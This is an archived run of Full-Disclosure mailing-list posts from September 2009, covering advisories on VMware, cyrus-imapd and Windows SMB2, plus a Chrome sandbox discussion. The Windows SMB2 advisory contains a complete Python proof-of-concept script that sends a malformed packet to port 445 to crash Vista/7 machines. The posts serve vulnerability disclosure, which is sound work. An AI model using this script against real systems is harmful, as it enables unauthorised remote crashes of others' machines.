[Full-disclosure] DefCon 17 CTF packet captures online

2009-09-07 Thread Holt Sorenson 
We have just finished the last bits in getting the DefCon
17 CTF packet captures online. Snag them from:

http://ddtek.biz/

<3 ur sheep and mom too,
ddtek

-- 
Holt Sorenson
h...@nosneros.net
www.nosneros.net/hso

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Secunia Research: VMWare VMnc Codec Mismatched Dimensions Buffer Overflow

2009-09-07 Thread Secunia Research 
== 

 Secunia Research 07/09/2009

  - VMWare VMnc Codec Mismatched Dimensions Buffer Overflow -

== 
Table of Contents

Affected Software1
Severity.2
Vendor's Description of Software.3
Description of Vulnerability.4
Solution.5
Time Table...6
Credits..7
References...8
About Secunia9
Verification10

== 
1) Affected Software 

* VMWare Workstation version 6.5.2 build 156735.

NOTE: Other products and versions may also be affected.

== 
2) Severity 

Rating: Highly critical
Impact: System access
Where:  Remote

== 
3) Vendor's Description of Software 

"VMware Workstation makes it simple to create and run multiple virtual
machines on your desktop or laptop computer. ... You can even use 
Workstation 6.5 to record and play video files ..."

Product Link:
http://www.vmware.com/products/ws/

== 
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in various VMWare 
products, which can be exploited by malicious people to compromise a 
user's system.

The vulnerability is caused due to a boundary error in the VMnc codec
(vmnc.dll) and can be exploited to cause a heap-based buffer overflow
via a specially crafted video file with mismatched dimensions.

Successful exploitation may allow execution of arbitrary code.

== 
5) Solution 

Update to version 6.5.3 build 185404.

== 
6) Time Table 

30/04/2009 - Vendor notified.
30/04/2009 - Vendor response.
21/08/2009 - Patched VMware Workstation, Player, and ACE released.
04/09/2009 - Patched VMware Workstation Movie Decoder released.
07/09/2009 - Public disclosure.

== 
7) Credits 

Discovered by Alin Rad Pop, Secunia Research.

== 
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2009-0199 for the vulnerability.

== 
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

== 
10) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2009-25/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [SECURITY] [DSA 1881-1] New cyrus-imapd packages fix arbitrary code execution

2009-09-07 Thread Nico Golde 
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1881-1secur...@debian.org
http://www.debian.org/security/ Nico Golde
September 7th, 2009 http://www.debian.org/security/faq
- --

Package: cyrus-imapd-2.2
Vulnerability  : buffer overflow
Problem type   : local (remote)
Debian-specific: no
CVE ID : none assigned yet

It was discovered that the SIEVE component of cyrus-imapd, a highly scalable
enterprise mail system, is vulnerable to a buffer overflow when processing
SIEVE scripts.  Due to incorrect use of the sizeof() operator an attacker is
able to pass a negative length to snprintf() calls resulting in large positive
values due to integer conversion.  This causes a buffer overflow which can be
used to elevate privileges to the cyrus system user.  An attacker who is able
to install SIEVE scripts executed by the server is therefore able to read and
modify arbitrary email messages on the system.


For the oldstable distribution (etch), this problem has been fixed in
version 2.2.13-10+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 2.2.13-14+lenny1.

For the testing (squeeze) and unstable (sid) distribution, this problem
will be fixed soon.


We recommend that you upgrade your cyrus-imapd-2.2 packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Debian (oldstable)
- --

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13-10+etch2.diff.gz
Size/MD5 checksum:   258553 dcbaf7e6c1f9ce896d2b2e75215797bd
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13-10+etch2.dsc
Size/MD5 checksum: 1298 7eac896a46888f98ab76fd6287c5eb2f
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13.orig.tar.gz
Size/MD5 checksum:  2109770 3ff679714836d1d7b1e1df0e026d4844

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-doc-2.2_2.2.13-10+etch2_all.deb
Size/MD5 checksum:   226846 45903c38c5442ab0bc393b09a374d28c
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-admin-2.2_2.2.13-10+etch2_all.deb
Size/MD5 checksum:80188 0fee8aa188fca06ca24f905e437f3621

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-murder-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:  1207538 1c4cc5eb3f83d0586e9ac3d7f0881a32
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-imapd-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:  1007132 7bcdb4a2bf9aff702bfa0ebb9708bc56
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-clients-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:   138358 acdcfa535f091c083e3c10136c033958
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/libcyrus-imap-perl22_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:   197654 f7305fa014e8b137efbc8e6dad92bd81
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-nntpd-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:   649710 46733c9a34e7df4ef49a91037f6e667d
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-dev-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:   302254 ff005ebe300d0b94233c335300ed7f51
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-pop3d-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:   297038 0c57dae1e59453a42263338c8d4fb4bf
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-common-2.2_2.2.13-10+etch2_alpha.deb
Size/MD5 checksum:  6053052 0a5c3aaaf6774d38e4d016f207996d39

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-nntpd-2.2_2.2.13-10+etch2_amd64.deb
Size/MD5 checksum:   612176 81da459bcdf3a79aeeb6db27ecdd8497
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/cyrus-clients-2.2_2.2.13-10+etch2_amd64.deb
Size/MD5 checksum:   132766 371d24b4e829b8f76795b209efdde682
  
http://security.debian.org/pool/updates/main/c/cyrus-imapd-2.2/libcyrus-imap-perl2

Re: [Full-disclosure] why not a sandbox

2009-09-07 Thread yersinia 
On Sat, Sep 5, 2009 at 12:58 PM, Adrenalin  wrote:

> It seems like the plugins in Chrome are not in a sandbox
>
> "One additional, important area that is not covered by the sandbox are
> plugins like Flash. Restricting what plugins can do does not fit well with
> what users expect, which makes plugins a major vector for attack. Langley
> said that the plugin support on Linux is relatively new, but "our
> experience on Windows is that, in order for Flash to do all the things that
> various sites expect it to be able to do, the sandbox has to be so full of
> holes that it's rather useless". He is currently looking at SELinux as a
> way to potentially restrict plugins, but, for now, they are wide open. "
>
> Google's Chromium sandbox - http://lwn.net/Articles/347547/ (August 19,
> 2009)
>
> From design-documents page "It is also possible to run the plugin processes
> inside a sandbox target, using the --safe-plugins command line." hm
>
> IMHO, if you want to go in a real or almost so , sandbox you have to
execute with a MAC security policy. Something like
http://danwalsh.livejournal.com/13376.html

BTW, xguest is on Fedora 10/11.  But a virtual machine could be better.
Protected with svirt, of course. http://danwalsh.livejournal.com/30565.html


> On Sat, Sep 5, 2009 at 12:23 PM, BlackHawk  wrote:
>
>> doesn't chrome already run any single tab in a sandbox?
>>
>> http://dev.chromium.org/developers/design-documents/sandbox
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

2009-09-07 Thread laurent gaffie 
=
- Release date: September 7th, 2009
- Discovered by: Laurent GaffiƩ
- Severity: Medium/High
=

I. VULNERABILITY
-
Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
-
Windows vista and newer Windows comes with a new SMB version named SMB2.
See:
http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0
for more details.

III. DESCRIPTION
-
SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL
REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB
server, and it's used
to identify the SMB dialect that will be used for futher communication.

IV. PROOF OF CONCEPT
-

Smb-Bsod.py:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT
-
An attacker can remotly crash without no user interaction, any Vista/Windows
7 machine with SMB enable.
Windows Xp, 2k, are NOT affected as they dont have this driver.

VI. SYSTEMS AFFECTED
-
Windows Vista/7 All (64b/32b|SP1/SP2 fully updated) and possibly Win Server
2008
as it use the same SMB2.0 driver (not tested).

VII. SOLUTION
-
Vendor contacted, but no patch available for the moment.
Close SMB feature and ports, until a patch is provided.

VIII. REFERENCES
-
http://microsoft.com

IX. CREDITS
-
This vulnerability has been discovered by Laurent GaffiƩ
Laurent.gaffie{remove-this}(at)gmail.com
http://g-laurent.blogspot.com/

X. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/